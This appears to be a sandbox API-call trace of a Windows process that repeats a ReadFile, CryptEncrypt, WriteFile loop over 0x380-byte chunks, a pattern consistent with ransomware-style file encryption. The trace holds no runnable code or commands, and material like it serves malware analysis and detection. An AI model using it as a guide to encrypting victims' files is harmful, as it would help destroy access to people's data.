ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.146] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.146] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.146] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.147] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.147] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.147] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.147] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.147] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.148] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.148] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.148] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.149] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.149] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.150] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.150] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.150] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.150] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.150] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.150] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.151] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.152] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.152] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.152] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.153] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.154] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.154] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.154] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.155] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.155] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.156] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 